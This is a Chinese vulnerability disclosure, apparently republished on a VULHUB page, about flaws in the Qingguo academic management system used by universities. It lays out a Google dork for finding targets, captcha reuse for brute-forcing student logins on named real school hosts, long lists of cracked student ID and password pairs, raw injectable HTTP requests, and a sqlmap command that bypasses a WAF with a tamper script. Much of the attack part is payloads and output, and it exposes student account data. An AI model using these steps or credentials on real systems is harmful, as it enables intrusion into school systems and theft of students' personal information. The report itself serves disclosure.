|青果教务系统多处漏洞可整站脱裤 - VULHUB开源网络安全威胁库

青果教务系统多处漏洞可整站脱裤

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：绕过WAF ### 详细说明：一、验证码可重复利用导致撞库漏洞今年，随着国外Gmail及国内多个大型电商受到撞库攻击，撞库已然成为高危漏洞。通过撞库，黑客可成功窃取大量账户作为进一步攻击的手段，现在全国多个高校在用的青果教务系统验证码未处理导致可重复利用，最终经过一些暴力枚举可获取学生信息谷歌：intitle:"学生综合管理系统" inurl:"xsweb" 可以获得不少青果管理系统主站登陆处案例1.http://xsweb.uvu.edu.cn/ 首先通过社工得到学号： http://zhidao.baidu.com/link?url=Yjp5QaLrzSDK9GQUuKROAtvvNH9iRGbqIJ8I7xsfAX0hfyrilWCR2WXsX14deKXmT_iHQggLbBzszA_EeYd9Kq 登陆后抓包，设定账户密码都为2013100000-2013100410爆破400+账户发现成功了300 ``` Payload1 Payload2 Length 2013100001 2013100001 10833 2013100002 2013100002 10833 2013100003 2013100003 10833 2013100004 2013100004 10833 2013100005 2013100005 10833 2013100006 2013100006 10833 2013100007 2013100007 10833 2013100008 2013100008 10833 2013100009 2013100009 10833 2013100010 2013100010 10833 2013100011 2013100011 10833 2013100012 2013100012 10833 2013100013 2013100013 10833 2013100014 2013100014 10833 2013100015 2013100015 10833 2013100016 2013100016 10833 2013100017 2013100017 10833 2013100018 2013100018 10833 2013100019 2013100019 10833 2013100020 2013100020 10833 2013100021 2013100021 10833 2013100022 2013100022 10833 2013100023 2013100023 10833 2013100024 2013100024 10833 2013100025 2013100025 10833 2013100026 2013100026 10833 2013100027 2013100027 10833 2013100028 2013100028 10833 2013100029 2013100029 10833 2013100031 2013100031 10833 2013100032 2013100032 10833 2013100033 2013100033 10833 2013100034 2013100034 10833 2013100035 2013100035 10833 2013100036 2013100036 10833 2013100037 2013100037 10833 2013100038 2013100038 10833 2013100039 2013100039 10833 2013100040 2013100040 10833 2013100041 2013100041 10833 2013100042 2013100042 10833 2013100043 2013100043 10833 2013100044 2013100044 10833 2013100045 2013100045 10833 2013100046 2013100046 10833 2013100047 2013100047 10833 2013100048 2013100048 10833 2013100051 2013100051 10833 2013100053 2013100053 10833 2013100054 2013100054 10833 2013100061 2013100061 10833 2013100062 2013100062 10833 2013100063 2013100063 10833 2013100064 2013100064 10833 2013100065 2013100065 10833 2013100066 2013100066 10833 2013100067 2013100067 10833 2013100068 2013100068 10833 2013100069 2013100069 10833 2013100070 2013100070 10833 2013100071 2013100071 10833 2013100072 2013100072 10833 2013100073 2013100073 10833 2013100074 2013100074 10833 2013100075 2013100075 10833 2013100076 2013100076 10833 2013100077 2013100077 10833 2013100078 2013100078 10833 2013100079 2013100079 10833 2013100080 2013100080 10833 2013100081 2013100081 10833 2013100082 2013100082 10833 2013100083 2013100083 10833 2013100084 2013100084 10833 2013100085 2013100085 10833 2013100086 2013100086 10833 2013100087 2013100087 10833 2013100088 2013100088 10833 2013100089 2013100089 10833 2013100090 2013100090 10833 2013100091 2013100091 10833 2013100092 2013100092 10833 2013100093 2013100093 10833 2013100094 2013100094 10833 2013100095 2013100095 10833 2013100096 2013100096 10833 2013100097 2013100097 10833 2013100098 2013100098 10833 2013100099 2013100099 10833 2013100100 2013100100 10833 2013100101 2013100101 10833 2013100102 2013100102 10833 2013100103 2013100103 10833 2013100104 2013100104 10833 2013100105 2013100105 10833 2013100106 2013100106 10833 2013100107 2013100107 10833 2013100108 2013100108 10833 2013100109 2013100109 10833 2013100110 2013100110 10833 2013100111 2013100111 10833 2013100112 2013100112 10833 2013100121 2013100121 10833 2013100122 2013100122 10833 2013100123 2013100123 10833 2013100124 2013100124 10833 2013100125 2013100125 10833 2013100126 2013100126 10833 2013100127 2013100127 10833 2013100128 2013100128 10833 2013100129 2013100129 10833 2013100130 2013100130 10833 2013100131 2013100131 10833 2013100132 2013100132 10833 2013100133 2013100133 10833 2013100134 2013100134 10833 2013100135 2013100135 10833 2013100136 2013100136 10833 2013100137 2013100137 10833 2013100138 2013100138 10833 2013100139 2013100139 10833 2013100140 2013100140 10833 2013100141 2013100141 10833 2013100142 2013100142 10833 2013100143 2013100143 10833 2013100144 2013100144 10833 2013100151 2013100151 10833 2013100152 2013100152 10833 2013100153 2013100153 10833 2013100154 2013100154 10833 2013100155 2013100155 10833 2013100156 2013100156 10833 2013100157 2013100157 10833 2013100158 2013100158 10833 2013100159 2013100159 10833 2013100160 2013100160 10833 2013100161 2013100161 10833 2013100162 2013100162 10833 2013100163 2013100163 10833 2013100164 2013100164 10833 2013100165 2013100165 10833 2013100166 2013100166 10833 2013100167 2013100167 10833 2013100168 2013100168 10833 2013100169 2013100169 10833 2013100170 2013100170 10833 2013100171 2013100171 10833 2013100172 2013100172 10833 2013100173 2013100173 10833 2013100174 2013100174 10833 2013100175 2013100175 10833 2013100176 2013100176 10833 2013100177 2013100177 10833 2013100178 2013100178 10833 2013100179 2013100179 10833 2013100180 2013100180 10833 2013100191 2013100191 10833 2013100192 2013100192 10833 2013100193 2013100193 10833 2013100194 2013100194 10833 2013100195 2013100195 10833 2013100196 2013100196 10833 2013100197 2013100197 10833 2013100198 2013100198 10833 2013100199 2013100199 10833 2013100200 2013100200 10833 2013100201 2013100201 10833 2013100202 2013100202 10833 2013100203 2013100203 10833 2013100204 2013100204 10833 2013100205 2013100205 10833 2013100206 2013100206 10833 2013100207 2013100207 10833 2013100208 2013100208 10833 2013100209 2013100209 10833 2013100210 2013100210 10833 2013100211 2013100211 10833 2013100212 2013100212 10833 2013100213 2013100213 10833 2013100214 2013100214 10833 2013100215 2013100215 10833 2013100216 2013100216 10833 2013100217 2013100217 10833 2013100218 2013100218 10833 2013100219 2013100219 10833 2013100220 2013100220 10833 2013100221 2013100221 10833 2013100222 2013100222 10833 2013100231 2013100231 10833 2013100232 2013100232 10833 2013100233 2013100233 10833 2013100234 2013100234 10833 2013100235 2013100235 10833 2013100236 2013100236 10833 2013100237 2013100237 10833 2013100238 2013100238 10833 2013100239 2013100239 10833 2013100240 2013100240 10833 2013100241 2013100241 10833 2013100242 2013100242 10833 2013100243 2013100243 10833 2013100244 2013100244 10833 2013100245 2013100245 10833 2013100246 2013100246 10833 2013100247 2013100247 10833 2013100248 2013100248 10833 2013100249 2013100249 10833 2013100250 2013100250 10833 2013100251 2013100251 10833 2013100252 2013100252 10833 2013100253 2013100253 10833 2013100254 2013100254 10833 2013100255 2013100255 10833 2013100256 2013100256 10833 2013100257 2013100257 10833 2013100258 2013100258 10833 2013100259 2013100259 10833 2013100271 2013100271 10833 2013100272 2013100272 10833 2013100273 2013100273 10833 2013100274 2013100274 10833 2013100275 2013100275 10833 2013100276 2013100276 10833 2013100277 2013100277 10833 2013100278 2013100278 10833 2013100279 2013100279 10833 2013100280 2013100280 10833 2013100281 2013100281 10833 2013100282 2013100282 10833 2013100283 2013100283 10833 2013100284 2013100284 10833 2013100285 2013100285 10833 2013100286 2013100286 10833 2013100287 2013100287 10833 2013100288 2013100288 10833 2013100289 2013100289 10833 2013100290 2013100290 10833 2013100291 2013100291 10833 2013100292 2013100292 10833 2013100293 2013100293 10833 2013100294 2013100294 10833 2013100295 2013100295 10833 2013100296 2013100296 10833 2013100297 2013100297 10833 2013100298 2013100298 10833 2013100311 2013100311 10833 2013100312 2013100312 10833 2013100313 2013100313 10833 2013100314 2013100314 10833 2013100315 2013100315 10833 2013100316 2013100316 10833 2013100317 2013100317 10833 2013100318 2013100318 10833 2013100319 2013100319 10833 2013100320 2013100320 10833 2013100321 2013100321 10833 2013100322 2013100322 10833 2013100323 2013100323 10833 2013100324 2013100324 10833 2013100325 2013100325 10833 2013100326 2013100326 10833 2013100327 2013100327 10833 2013100328 2013100328 10833 2013100329 2013100329 10833 2013100330 2013100330 10833 2013100331 2013100331 10833 2013100332 2013100332 10833 2013100333 2013100333 10833 2013100334 2013100334 10833 2013100335 2013100335 10833 2013100336 2013100336 10833 2013100337 2013100337 10833 2013100338 2013100338 10833 2013100339 2013100339 10833 2013100340 2013100340 10833 2013100351 2013100351 10833 2013100352 2013100352 10833 2013100353 2013100353 10833 2013100354 2013100354 10833 2013100355 2013100355 10833 2013100356 2013100356 10833 2013100357 2013100357 10833 2013100358 2013100358 10833 2013100359 2013100359 10833 2013100360 2013100360 10833 2013100361 2013100361 10833 2013100362 2013100362 10833 2013100363 2013100363 10833 2013100364 2013100364 10833 2013100365 2013100365 10833 2013100366 2013100366 10833 2013100367 2013100367 10833 2013100368 2013100368 10833 2013100369 2013100369 10833 2013100370 2013100370 10833 2013100371 2013100371 10833 2013100372 2013100372 10833 2013100373 2013100373 10833 2013100374 2013100374 10833 2013100375 2013100375 10833 2013100376 2013100376 10833 2013100402 2013100402 10833 2013100405 2013100405 10833 ``` 登陆一个2013100334 [<img src="https://images.seebug.org/upload/201501/081526518484656465508a8ae42c17ec553b9a64.jpg" alt="q.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/081526518484656465508a8ae42c17ec553b9a64.jpg) 还知道他宿舍在哪儿 [<img src="https://images.seebug.org/upload/201501/08152801f46954544ef0ccb8337919679e9e913e.jpg" alt="q1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/08152801f46954544ef0ccb8337919679e9e913e.jpg) 案例2.http://jw.ynjtc.com/xsweb 密码123456测试即可得160账户 ``` Payload Length 2013880840 13986 2013880852 13986 2013880900 13986 2013880901 13986 2013880935 13986 2013880936 13986 2013880966 13986 2013881002 13986 2013881047 13986 2013881068 13986 2013881069 13986 2013881083 13986 2013881109 13986 2013881116 13986 2013881139 13986 2013881148 13986 2013881194 13986 2013881248 13986 2013881315 13986 2013881361 13986 2013881398 13986 2013881403 13986 2013881409 13986 2013881413 13986 2013881442 13986 2013881456 13986 2013881492 13986 2013881515 13986 2013881572 13986 2013881597 13986 2013881652 13986 2013881677 13986 2013881697 13986 2013881779 13986 2013881843 13986 2013881851 13986 2013881852 13986 2013881855 13986 2013881886 13986 2013881914 13986 2013881917 13986 2013881918 13986 2013881985 13986 2013881986 13986 2013881989 13986 2013882009 13986 2013882013 13986 2013882014 13986 2013882055 13986 2013882168 13986 2013882191 13986 2013882213 13986 2013882237 13986 2013882284 13986 2013882332 13986 2013882366 13986 2013882402 13986 2013882520 13986 2013882540 13986 2013882549 13986 2013882605 13986 2013882609 13986 2013882625 13986 2013882643 13986 2013882652 13986 2013882655 13986 2013882668 13986 2013882670 13986 2013882677 13986 2013882685 13986 2013882697 13986 2013882699 13986 2013882700 13986 2013882715 13986 2013882746 13986 2013882785 13986 2013882790 13986 2013882805 13986 2013882819 13986 2013882839 13986 2013882846 13986 2013882853 13986 2013882874 13986 2013882878 13986 2013882882 13986 2013882884 13986 2013882889 13986 2013882902 13986 2013882919 13986 2013882930 13986 2013882972 13986 2013882985 13986 2013882997 13986 2013883004 13986 2013883009 13986 2013883012 13986 2013883013 13986 2013883046 13986 2013883048 13986 2013883076 13986 2013883132 13986 2013883137 13986 2013883149 13986 2013883157 13986 2013883165 13986 2013883185 13986 2013883192 13986 2013883196 13986 2013883207 13986 2013883265 13986 2013883287 13986 2013883301 13986 2013883363 13986 2013883364 13986 2013883391 13986 2013883394 13986 2013883429 13986 2013883450 13986 2013883502 13986 2013883508 13986 2013883550 13986 2013883582 13986 2013883586 13986 2013883607 13986 2013883608 13986 2013883627 13986 2013883650 13986 2013883671 13986 2013883738 13986 2013883745 13986 2013883749 13986 2013883754 13986 2013883756 13986 2013883757 13986 2013883758 13986 2013883763 13986 2013883772 13986 2013883810 13986 2013883824 13986 2013883827 13986 2013883934 13986 2013883935 13986 2013883936 13986 2013883937 13986 2013883950 13986 2013883970 13986 2013883980 13986 2013884010 13986 2013884012 13986 2013884026 13986 2013884060 13986 2013884080 13986 2013884083 13986 2013884159 13986 2013884160 13986 2013884177 13986 ``` 账户密码相同的也有22个 ``` Payload1 Payload2 Length 2013881377 2013881377 13986 2013881406 2013881406 13986 2013881568 2013881568 13986 2013881751 2013881751 13986 2013882079 2013882079 13986 2013882313 2013882313 13986 2013882381 2013882381 13986 2013882563 2013882563 13986 2013882593 2013882593 13986 2013882999 2013882999 13986 2013883197 2013883197 13986 2013883223 2013883223 13986 2013883464 2013883464 13986 2013883599 2013883599 13986 2013883652 2013883652 13986 2013883751 2013883751 13986 2013883798 2013883798 13986 2013883971 2013883971 13986 2013883975 2013883975 13986 2013884030 2013884030 13986 2013884184 2013884184 13986 ``` [<img src="https://images.seebug.org/upload/201501/0815295459bf3ac03fed93e6a85c2af025077c42.jpg" alt="q2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/0815295459bf3ac03fed93e6a85c2af025077c42.jpg) 案例3.http://219.228.48.108:81/xsweb/ 扫110201000-110201999 1000账户中账户密码相同的有100+ ``` Payload1 Payload2 Length 110201102 110201102 10877 110201103 110201103 10877 110201104 110201104 10877 110201105 110201105 10877 110201106 110201106 10877 110201107 110201107 10877 110201108 110201108 10877 110201109 110201109 10877 110201110 110201110 10877 110201111 110201111 10877 110201112 110201112 10877 110201113 110201113 10877 110201114 110201114 10877 110201115 110201115 10877 110201116 110201116 10877 110201117 110201117 10877 110201118 110201118 10877 110201119 110201119 10877 110201120 110201120 10877 110201121 110201121 10877 110201122 110201122 10877 110201123 110201123 10877 110201124 110201124 10877 110201125 110201125 10877 110201126 110201126 10877 110201127 110201127 10877 110201128 110201128 10877 110201129 110201129 10877 110201130 110201130 10877 110201131 110201131 10877 110201132 110201132 10877 110201133 110201133 10877 110201134 110201134 10877 110201135 110201135 10877 110201136 110201136 10877 110201137 110201137 10877 110201138 110201138 10877 110201139 110201139 10877 110201140 110201140 10877 110201141 110201141 10877 110201142 110201142 10877 110201143 110201143 10877 110201144 110201144 10877 110201145 110201145 10877 110201146 110201146 10877 110201147 110201147 10877 110201148 110201148 10877 110201149 110201149 10877 110201150 110201150 10877 110201151 110201151 10877 110201152 110201152 10877 110201153 110201153 10877 110201154 110201154 10877 110201155 110201155 10877 110201156 110201156 10877 110201157 110201157 10877 110201158 110201158 10877 110201201 110201201 10877 110201202 110201202 10877 110201203 110201203 10877 110201204 110201204 10877 110201205 110201205 10877 110201206 110201206 10877 110201207 110201207 10877 110201208 110201208 10877 110201209 110201209 10877 110201210 110201210 10877 110201211 110201211 10877 110201212 110201212 10877 110201213 110201213 10877 110201214 110201214 10877 110201215 110201215 10877 110201216 110201216 10877 110201217 110201217 10877 110201218 110201218 10877 110201219 110201219 10877 110201220 110201220 10877 110201221 110201221 10877 110201222 110201222 10877 110201223 110201223 10877 110201224 110201224 10877 110201225 110201225 10877 110201226 110201226 10877 110201227 110201227 10877 110201228 110201228 10877 110201229 110201229 10877 110201230 110201230 10877 110201231 110201231 10877 110201232 110201232 10877 110201233 110201233 10877 110201234 110201234 10877 110201235 110201235 10877 110201236 110201236 10877 110201237 110201237 10877 110201238 110201238 10877 110201239 110201239 10877 110201240 110201240 10877 110201241 110201241 10877 110201242 110201242 10877 110201243 110201243 10877 110201244 110201244 10877 110201245 110201245 10877 110201246 110201246 10877 110201247 110201247 10877 110201248 110201248 10877 110201249 110201249 10877 110201250 110201250 10877 110201251 110201251 10877 110201252 110201252 10877 110201253 110201253 10877 110201254 110201254 10877 110201255 110201255 10877 110201256 110201256 10877 ``` 案例4.http://121.8.99.242/xsweb [<img src="https://images.seebug.org/upload/201501/081531131df82012a2ac4bc7d63245080d646d4f.jpg" alt="q3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/081531131df82012a2ac4bc7d63245080d646d4f.jpg) 二、SQL注入漏洞[WAF绕过方法：--tamper "equaltolike.py"] 0x00 注入点1: [<img src="https://images.seebug.org/upload/201501/08153538e73e924f592c46fd7a60845c6e2e06c8.jpg" alt="q4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/08153538e73e924f592c46fd7a60845c6e2e06c8.jpg) 1.http://xsweb.uvu.edu.cn/default.aspx 点击上面检索后抓包类似如下：使用python sqlmap.py -r 1.txt --tamper "equaltolike.py" --is-dba --dbs 即可绕过WAF ``` POST /TZJK/ViewHabitusHealthStandard_rpt.aspx HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://xsweb.uvu.edu.cn/TZJK/ViewHabitusHealthStandard.aspx Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-US;q=0.5,en;q=0.3 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MALCJS) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Content-Length: 12 DNT: 1 Host: xsweb.uvu.edu.cn Pragma: no-cache Cookie: safedog-flow-item=784D7EA494F6B01DC142459982879EC4; ASP.NET_SessionId=yb00m5a42vv3uorfpfzbvzy2 type=1&sex=1* ``` [<img src="https://images.seebug.org/upload/201501/081537004f3718ff35da421b617c661d68748081.jpg" alt="q5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/081537004f3718ff35da421b617c661d68748081.jpg) 2.http://jw.ynjtc.com/xsweb [<img src="https://images.seebug.org/upload/201501/081538107980e30a35708aeea059e40a0ddeaaab.jpg" alt="q6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/081538107980e30a35708aeea059e40a0ddeaaab.jpg) 3.http://219.228.48.108:81/xsweb/ [<img src="https://images.seebug.org/upload/201501/08154147879696c0b55acc4a5e69e93e0949c12e.jpg" alt="q7.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/08154147879696c0b55acc4a5e69e93e0949c12e.jpg) 0x01 注入点2： [<img src="https://images.seebug.org/upload/201501/08154414b9451f8c6ed3a7391c6be5d27396894e.jpg" alt="q8.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/08154414b9451f8c6ed3a7391c6be5d27396894e.jpg) http://219.228.48.108:81 抓包类似如下： ``` POST /xsweb/TZJK/ViewHabitusHealthEducationPlan_rpt.aspx HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://219.228.48.108:81/xsweb/TZJK/ViewHabitusHealthEducationPlan.aspx Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-US;q=0.5,en;q=0.3 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MALCJS) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Content-Length: 12 DNT: 1 Host: 219.228.48.108:81 Pragma: no-cache Cookie: ASP.NET_SessionId=exdzo445xffrfqqfssmmyoup xn=2012&xq=0* ``` [<img src="https://images.seebug.org/upload/201501/0815452136df43c3655231ccb68f38a4f6e924d2.jpg" alt="q9.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/0815452136df43c3655231ccb68f38a4f6e924d2.jpg) 0x02 注入点3 [<img src="https://images.seebug.org/upload/201501/08154608e324b497c61b21779b5b56ce1ae5da8a.jpg" alt="q10.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/08154608e324b497c61b21779b5b56ce1ae5da8a.jpg) [<img src="https://images.seebug.org/upload/201501/08154643059b22666611f08cc6314a818587ec7e.jpg" alt="q11.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/08154643059b22666611f08cc6314a818587ec7e.jpg) 0x03 注入点4 [<img src="https://images.seebug.org/upload/201501/0815474403561ce2d481c7734325ccb25800d86c.jpg" alt="q13.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/0815474403561ce2d481c7734325ccb25800d86c.jpg) [<img src="https://images.seebug.org/upload/201501/0815475434fb405eb72b930c5519b026573fb2a1.jpg" alt="q12.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/0815475434fb405eb72b930c5519b026573fb2a1.jpg) 0x04 注入点5、6、7、8 [<img src="https://images.seebug.org/upload/201501/081549180b2a8d68d8e9209f528c3c53f1170e4c.jpg" alt="q14.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/081549180b2a8d68d8e9209f528c3c53f1170e4c.jpg) [<img src="https://images.seebug.org/upload/201501/081549310041c9295ee67e962cf923d957209cac.jpg" alt="q15.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/081549310041c9295ee67e962cf923d957209cac.jpg) [<img src="https://images.seebug.org/upload/201501/0815494241219ea4e443fefdae3f9fe8dd92e9bd.jpg" alt="q16.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/0815494241219ea4e443fefdae3f9fe8dd92e9bd.jpg) [<img src="https://images.seebug.org/upload/201501/08154950cfba493e9cd3fa06404ec72c8af5bc71.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/08154950cfba493e9cd3fa06404ec72c8af5bc71.jpg) 0x05 注入点9、10【抓包加'没回显的注入】 [<img src="https://images.seebug.org/upload/201501/081551340a52863345461998eafb55b528202124.jpg" alt="q17.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/081551340a52863345461998eafb55b528202124.jpg) ``` POST /xsweb/SXZZ/ViewMGActivity_rpt.aspx HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://219.228.48.108:81/xsweb/SXZZ/ViewMGActivity.aspx Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-US;q=0.5,en;q=0.3 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MALCJS) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Content-Length: 16 DNT: 1 Host: 219.228.48.108:81 Pragma: no-cache Cookie: ASP.NET_SessionId=exdzo445xffrfqqfssmmyoup sel_xn=2012*&xq=0 ``` [<img src="https://images.seebug.org/upload/201501/08155153954319127b487944140a8b433ab5498b.jpg" alt="q18.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/08155153954319127b487944140a8b433ab5498b.jpg) [<img src="https://images.seebug.org/upload/201501/08155222b1dbdae2b0fa70e3db3482a08e42564b.jpg" alt="q19.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/08155222b1dbdae2b0fa70e3db3482a08e42564b.jpg) ``` POST /xsweb/SXZZ/ViewWinActivity_rpt.aspx HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://219.228.48.108:81/xsweb/SXZZ/ViewWinActivity.aspx Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-US;q=0.5,en;q=0.3 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MALCJS) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Content-Length: 16 DNT: 1 Host: 219.228.48.108:81 Pragma: no-cache Cookie: ASP.NET_SessionId=exdzo445xffrfqqfssmmyoup sel_xn=2012&xq=0 ``` [<img src="https://images.seebug.org/upload/201501/08155253e15b2d4ec42ae49502d58d3d3f7c8503.jpg" alt="q20.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/08155253e15b2d4ec42ae49502d58d3d3f7c8503.jpg) ### 漏洞证明：见详细

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™